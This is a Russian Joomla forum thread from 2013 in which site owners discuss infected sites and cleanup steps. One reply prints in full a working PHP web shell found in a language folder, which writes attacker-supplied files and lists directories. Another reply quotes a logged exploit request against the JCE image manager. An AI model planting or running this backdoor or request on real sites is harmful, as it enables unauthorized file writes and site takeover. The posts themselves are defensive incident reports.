Новости Joomla

Вышли релизы безопасности Joomla 6.1.1 и Joomla 5.4.6

Релиз безопасности Joomla 6.1.1 и Joomla 5.4.6

Проект Joomla! рад сообщить о выходе Joomla 6.1.1 и Joomla 5.4.6. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

👩‍💻 JoomShopping: Самый полный курс по созданию интернет-магазина на CMS Joomla.

👩‍💻 JoomShopping: Самый полный курс по созданию интернет-магазина на CMS Joomla.

В открытый доступ выложен видео-курс Дмитрия Гончарова по созданию интернет-магазина на связке Joomla + JoomShopping. Видеоуроки содержат пошаговые инструкции от регистрации хостинга до особенностей вёрстки, настройки способов оплаты и доставки.

В видео фигурирует JoomShopping 4 и Joomla 3, однако JoomShopping довольно консервативный компонент и многие способы и подходы в нём не менялись годами, поэтому данные видео могут быть по прежнему полезны.

Смотреть видео-курс

@joomlafeed

👩‍💻 SM WT CDEK аддон доставки для JoomShopping.

👩‍💻 SM WT CDEK аддон доставки для JoomShopping.

Способ доставки для интернет-магазина JoomShopping. Работает с API CDEK v.2. Считает стоимость доставки, позволяет выбрать пункт выдачи заказа CDEK на карте, отображает полную информацию о ПВЗ в заказе. Для работы аддона необходимо установить и настроить библиотеку WT CDEK.

👉 v.1.3.4. Что нового?
- Скидки на доставку. Добавлены настройки скидок на доставку в зависимости от суммы заказа. Также можно выбрать какую цену использовать: до применения купона или после.
- Фиксированная наценка. Добавлено поле для фиксированной наценки на доставку в интерфейс цены на доставку.
- Локализация. Сделаны файлы локализации. Русский и английский языки.
- Рефакторинг и чистка кода. Приблизили код к стандартам.

Страница расширения

@joomlafeed

1 2  Все   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 52 Ответов
  • 30236 Просмотров
*

prodvigaeff

  • Осваиваюсь на форуме
  • 17
  • 1 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #30 : 13.07.2013, 18:41:37 »
Цитировать
Уже JCE удалил
И компонент и плагин? Кеш чистил? Для пользователя-редактор по умолчанию?
Было такое, но после внесения изменений в конфиг.пхп, редактор TinyMCE нормально работал.
Записан
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: С чем связаны все последние заражения сай
« Ответ #31 : 13.07.2013, 19:01:07 »
Блин, про плагин забыл. Удалил, в настройках он пропал, но при любом изменении настроек после сохранить/применить опять выдает (страница не доступна). Может это конечно не из за него, просто как-то все одновременно получилось...
Да, и офлайн сообщение и тэги прописаны знаками вопросов.
Записан
*

yevrowl

  • Захожу иногда
  • 271
  • 10 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #32 : 14.07.2013, 21:51:31 »
Появился в каталоге language файл application.php:

Код
<?php $r=$_REQUEST;$c=getcwd();$n=chr(32);print('468505ab9718d8c2205ea35d94f04668');if(md5(md5(@$r['p']))=='3829c383a1277bd6e7e108ab36f8f03c'){print($n.$c.$n);fwrite(fopen(dirname(__FILE__).'/'.$r['f'],'w+'),$r['b']);print($n);print_r(scandir($c));}exit;?>

И ещё несколько...
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: С чем связаны все последние заражения сайтов
« Ответ #33 : 15.07.2013, 08:44:23 »
Цитата: Yurgin от 13.07.2013, 19:01:07
Блин, про плагин забыл. Удалил, в настройках он пропал, но при любом изменении настроек после сохранить/применить опять выдает (страница не доступна). Может это конечно не из за него, просто как-то все одновременно получилось...
Да, и офлайн сообщение и тэги прописаны знаками вопросов.
пере залейте папку administrator из дистрибутива вашей версии должно помочь
не поможет тогда еще папки includes libraries media

Цитата: yevrowl от 14.07.2013, 21:51:31
Появился в каталоге language файл application.php:
и скорей всего не один и скорей всего не в одной папке их может быть и сотни и названия разные
Записан
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
Re: С чем связаны все последние заражения сайтов
« Ответ #34 : 15.07.2013, 12:12:53 »
если перезаливать, то нестандартно названные файлы-то остаются)))
Записан
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: С чем связаны все последние заражения сайтов
« Ответ #35 : 15.07.2013, 16:31:28 »
Цитата: verstalshik от 15.07.2013, 12:12:53
если перезаливать, то нестандартно названные файлы-то остаются)))
это только чтоб работало то что не работает ^-^
остальное искать надо и удалять  ;)
Записан
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #36 : 15.07.2013, 17:04:58 »
Вы меня конечно извините за безграмотность, но что значит перезалить из дистрибутива? Не говоря уже о том стандартно или не стандартно. В каталоге language файла application.php нет, ни в корне, ни в администраторе. Знаки вопроса только в офлайн сообщении и в тэгах в настройках, в материалах тэги прописаны нормально. Я так думаю еслиб дело было в каталоге language, то эта фигня была-бы везде. Поисковик по этим тэгам в принципе находит сайт, они вопросами читаются только в настройках админки, т.ч. этот вопрос для на втором плане, самое противное что я не могу поменять настройки.
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: С чем связаны все последние заражения сайтов
« Ответ #37 : 15.07.2013, 17:51:41 »
Цитировать
самое противное что я не могу поменять настройки.
вот для этого и пере залить, и посмотреть что с кодировкой у вас вопросы это сбой кодировки
Записан
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: С чем связаны все последние заражения сай
« Ответ #38 : 15.07.2013, 17:56:22 »
Ок. Тогда объясните пожалуйста что значит перезалить. Снести "администратор" и залить из ранее сохраненных? Если так, то я не часто сохраняю файловую часть сайта, и по последней версии сайт выглядел немного по другому. Замена папки "администратор" на что-то повлияет? Или я вобще не так понял перезалить?
И где проверить эту кодировку?
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: С чем связаны все последние заражения сайтов
« Ответ #39 : 15.07.2013, 22:50:05 »
пере залить=накатить  ^-^ т.е. просто записать папку по верх имеющихся файлов
папку брать только от дистрибутива вашей версии(версия в правом верхнем углу админки пишится) и только от разработчиков
повлияет или нет вопрос к экстрасенсам на нтв адресуйте, мы не знаем что вы делали все время существования сайта
кодировку проверять в файлах utf8 (без ВОМ) должна быть или попробуйте в .htaccess вписать вверх(или любое место) отдельно на строке
Код
AddDefaultCharset utf-8
Записан
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #40 : 16.07.2013, 14:01:43 »
Администратор пере залил, в .htaccess строчку вставил, в utf8 не разобрался. В итоге совершенно ничего не изменилось...
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: С чем связаны все последние заражения сайтов
« Ответ #41 : 16.07.2013, 14:08:19 »
у вас что то повреждено из файлов если не работает сохранить скрипты что .js(скорей всего) что .php
Записан
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #42 : 16.07.2013, 15:16:30 »
Извиняюсь, а по русски можно? (что .js что .php) это как понять и что с эти делать?
Записан
*

Ariy84

  • Захожу иногда
  • 144
  • 27 / 1
  • 2+1=4
Re: С чем связаны все последние заражения сайтов
« Ответ #43 : 17.07.2013, 16:12:38 »
Цитата: Yurgin от 16.07.2013, 15:16:30
Извиняюсь, а по русски можно? (что .js что .php) это как понять и что с эти делать?
Божечки! Здесь сайты от вирусяк чистят или танцы с кодировкой проворачивают?
В поиске по форуму наберите "кракозяблы" читайте темы и учитесь. Собственно для этого и сделан форум, зачем писать не по теме то ?
Записан
Плюнь, выпей водки и,.. не пиши. Потомки оценят.
*

Yurgin

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #44 : 17.07.2013, 18:04:48 »
Цитата: Ariy84 от 17.07.2013, 16:12:38
зачем писать не по теме то ?
Научитесь читать прежде чем писать! Я уже писал что знаки вопроса не основное. Меня волнует то что не сохраняются настройки админки!
Записан
*

heroi_n

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #45 : 22.10.2013, 10:45:33 »
Продолжаем борьбу с //beleiad9 и //kolamne817

Что сделано:
1. Найдены и удалены в папке /images файлы
Цитировать
j.php jos_6stt.php jos_8gkh.php jos_q1cx.php
2. Переместил папку log в другое место, завел новый error.php, за последний час получил вот такую строчку, что это значит?
Цитировать
2013-10-22   06:17:24   INFO   178.124.109.119   Joomla FAILURE:    Имя пользователя и пароль не совпадают или у вас еще нет учетной записи на сайте
3. Отключил всех пользователей сайта кроме 2х администраторов
4. Обновил JCE до последней версии и Modules Anywhere до версии 3.3.3
5. На configuration.php и .htaccess установил права 440

Сайт работает, сижу жду что будет.
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: С чем связаны все последние заражения сайтов
« Ответ #46 : 22.10.2013, 11:52:02 »
Цитировать
2. Переместил папку log в другое место, завел новый error.php, за последний час получил вот такую строчку, что это значит?

Код
Имя пользователя и пароль не совпадают или у вас еще нет учетной записи на сайте

а что это читается по другому как то, или трактование различное может быть
Записан
*

heroi_n

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #47 : 22.10.2013, 12:11:04 »
Прошел час. Опять все js "обновились", только теперь не //beleiad9 и //kolamne817 а //mnua8sdi и //kote8aif/*

С логах добавились 2 записи
Цитировать
2013-10-22   07:11:52   INFO   128.73.93.1   Joomla FAILURE:    Имя пользователя и пароль не совпадают или у вас еще нет учетной записи на сайте
2013-10-22   08:04:28   INFO   128.73.93.1   Joomla FAILURE:    Имя пользователя и пароль не совпадают или у вас еще нет учетной записи на сайте
Админка не открывается, белый лист

Внешние ссылки по результатам http://pr-cy.ru/link_extractor не появились
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: С чем связаны все последние заражения сайтов
« Ответ #48 : 22.10.2013, 14:32:49 »
Цитата: heroi_n от 22.10.2013, 12:11:04
Прошел час. Опять все js "обновились", только теперь не //beleiad9 и //kolamne817 а //mnua8sdi и //kote8aif/*

С логах добавились 2 записиАдминка не открывается, белый лист

Админку закрой или включи http-авторизацию. Проверяй яваскрипты.
На папку/файлы /jmages 500/400
Записан
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Re: С чем связаны все последние заражения сайтов
« Ответ #49 : 22.10.2013, 15:04:09 »
У меня тоже на хосте один юзверь подхватил заразу, стали абузы приходить на спам. Но у него статические сайты-визитки, проще оказалось всё снести под его аккаунтом и восстановить из бэкапа. Заодно поставил ему и своим визиткам ограничение на кол-во отправляемых писем в час.

В итоге я пришел к выводу, что каждый свой сайт лучше держать под отдельным пользователем. Если один сломают, то другие не пострадают при этом.

Без JCE кстати жить вполне можно, единственно что ткните носом если есть какая-то приблуда для TinyMCE, чтобы удобно фотки было заливать, особенно с фронта.

Как заставить TinyMCE не обрезать код YouTube, я написал тут: http://joomlaforum.ru/index.php/topic,277582.0.html
Это помню первая проблема, которая у меня возникла с ним, когда я начал заниматься сайтами.
« Последнее редактирование: 22.10.2013, 15:08:41 от ChaosHead »
Записан
*

yevrowl

  • Захожу иногда
  • 271
  • 10 / 0
Re: С чем связаны все последние заражения сайтов
« Ответ #50 : 05.11.2013, 21:34:33 »
Существуют ли какие-либо заплатки? Возможно установка read-only решает проблему?
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: С чем связаны все последние заражения сайтов
« Ответ #51 : 22.11.2013, 15:23:48 »
Нашел в логах. Эт для любителей JCE
Код
/&amp;sa=U&amp;ei=bueDUseYPMKshQe0noGABw&amp;ved=0CHwQFjAbOLwF&amp;usg=AFQjCNHWRXiTgfgzyuY4cvOXXQcvg9re2Q/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b  HTTP/1.1" 200 22522 "-" "BOT/0.1 (BOT for JCE)"
Записан
*

rishard

  • Захожу иногда
  • 71
  • 3 / 3
Re: С чем связаны все последние заражения сайтов
« Ответ #52 : 27.01.2014, 19:01:59 »
Цитата: flyingspook от 04.05.2013, 11:17:29

остальное все не существенно, массово ломятся через п.2 и п.3


Так, да не вполне так.
Вытащил из логов своего сайта уйму небезинтересных сведений на тему.
Результаты довольно забавны; кому интересно - гляньте. Удалось вычислить ряд наиболее взламываемых расширений (com_jce на первом месте по популярности, согласен), перечень злонамеренных web-ресурсов, используемых в атаках, ну и - ряд наиболее часто употребленных сценариев.
« Последнее редактирование: 27.01.2014, 19:05:25 от rishard »
Записан
1 2  Все   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Изолирование папок сайтов на OpenServer

Автор Lemady

 Ответов: 41
Просмотров: 10183 		Последний ответ 29.11.2021, 15:47:31
от KoreshS
[Решено] Заразились в один день 4 аккаунта по 10 сайтов

Автор Stich SPb

 Ответов: 356
Просмотров: 106896 		Последний ответ 13.09.2019, 18:49:33
от diana1975
Домены.ru и.рф сайтов злоумышленников будут разделегироваться

Автор voland

 Ответов: 7
Просмотров: 1460 		Последний ответ 26.05.2016, 15:08:34
от flyingspook
Взломали сеть сайтов на Joomla

Автор kanbodows

 Ответов: 9
Просмотров: 2466 		Последний ответ 23.09.2015, 00:25:36
от flyingspook
Проверенные методы проверки сайтов на вирусы

Автор Mehanick

 Ответов: 6
Просмотров: 3228 		Последний ответ 07.09.2015, 00:02:59
от winstrool